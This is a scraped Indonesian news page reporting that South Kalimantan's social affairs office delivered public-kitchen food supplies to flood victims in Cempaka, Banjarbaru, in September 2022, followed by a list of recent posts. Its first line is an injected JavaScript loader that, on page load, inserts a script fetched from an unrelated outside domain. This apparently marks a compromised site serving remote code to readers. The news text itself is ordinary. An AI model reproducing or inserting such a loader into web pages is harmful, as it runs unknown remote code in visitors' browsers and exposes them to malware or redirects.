(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Pemprov Kalsel Salurkan Bantuan Bahan Dapur Umum di Cempaka


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Provinsi (Pemprov) Kalimantan Selatan melalui Dinas Sosial (Dinsos) Provinsi Kalsel mendistirbusikan bantuan bahan makanan kepada warga terdampak banjir di Kecamatan Cempaka, Banjarbaru, Senin (5/9/2022).

Kepala Bidang Perlindungan dan Jaminan Sosial Dinsos Kalsel, Achmadi mengatakan, sesuai intruksi Gubernur Kalsel, H Sahbirin Noor untuk segera terjun ke lapangan memberikan respon percepatan bantuan kepada warga penyintas banjir di Kalsel.

“Sesuai instruksi Pak Gubernur, untuk memberikan respons percepatan bantuan terutama untuk pengurangan resiko bencana termasuk juga pemulihan korban bencana,” katanya.

Salah satunya, pihaknya membuka dapur umum lapangan, karena Dinsos salah satu tugas pokoknya memberikan bantuan permakanan 3 kali sehari bagi penyintas banjir.

 

Baca juga : Tolak Kenaikan BBM, Ricuh Dekat Istana hingga Duduki Ruang Paripurna

“Yang kami bawa hari ini adalah bantuan untuk dapur umum lapangan, walau sifatnya darurat kalau kurang Pemprov Kalsel siap kirim,” bebernya.

Dikatakan Madi sapaan akrabnya, Pemprov Kalsel siap membantu, jika terjadi kekurangan bantuan pihaknya siap mendistirbusikan lagi dalam rangka tanggap darurat.

Dilanjutkannya Madi, kantong-kantong bencana harus diisi salah satunya Kampung Siaga Bencana (KSB) Trisakti di Sungai Tiung merupakan binaan dari Dinsos Provinsi Kalsel dalam menghadapi becana di wilayahnya.

“Salah satu kawan-kawan yang melaksanakan dapur umum ini adalah dari KSB binaan Pemprov Kalsel,” tambahnya.

 

Baca juga  : “Pejuang Seorang Mualaf Liem Ho Ho” dari Banjarmasin, Buku Baru Konten Lokal Perpustakaan Palnam

Dinsos Kalsel menyalurkan bahan makanan seperti beras, sarden, mie instan, air mineral dan bahan makanan dasar lainnya untuk warga terdampak banjir.

Ditegaskan Madi, bantuan lainnya seperti kasur, selimut dan lainnya akan segera menyusul, untuk sementara hanya mendatangkan bantuan dapur umum.

“Bantuan lainnya nanti akan segera kita penuhi, di KSB dan Dinsos Kota Banjarbaru nanti kita akan isi lagi, tidak ada masalah untuk kebutuhan logistik kita siap dorong disemua kabupaten kota,” tegasnya

Tak hanya di Banjarbaru, Dinsos Kalsel baru-baru ini juga mendistirbusikam bantuan di wilayah Tanah Bumbu, Tanah Laut dan Kotabaru.

 

Baca juga : Dinsos-BPBD Banjarbaru Buka Dapur Umum, 1.979 Warga Terdampak Banjir Cempaka

“Beberapa hari yang lalu juga memberikan bantuan tanggap darurat, saat ini yang kita waspadai adalah daerah Tanah Laut dan Tanah Bumbu ini pasti akan terulang,”

Lebih juah Madi menuturkan hujan mengguyur wilayah Kalsel merata sejak beberapa waktu lalu. Dirinya berharap tidak semua wilayah di Kalsel terdampak banjir. Pemprov Kalsel bekerjasama Dinsos kabupaten kota siap saling bersinergi dalam penanganan bencana di Kalsel.

“13 kabupaten kota terdampak curah hujan, mudah-mudahan tidak semua terjadi bencana banjir, dengan gerak cepat Pemrpov Kalsel bekerjasama dengan Dinsos Kabupaten/kota terutama Dinsos Kota Banjarbaru, Camat Cempaka dan lurah Sungai Tiung, alhamdulillah bisa kita sinergikan untuk menangani bencana ini,” pungkasnya.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : cell


Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

6 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

7 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

7 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

11 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

13 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

13 jam ago

This website uses cookies.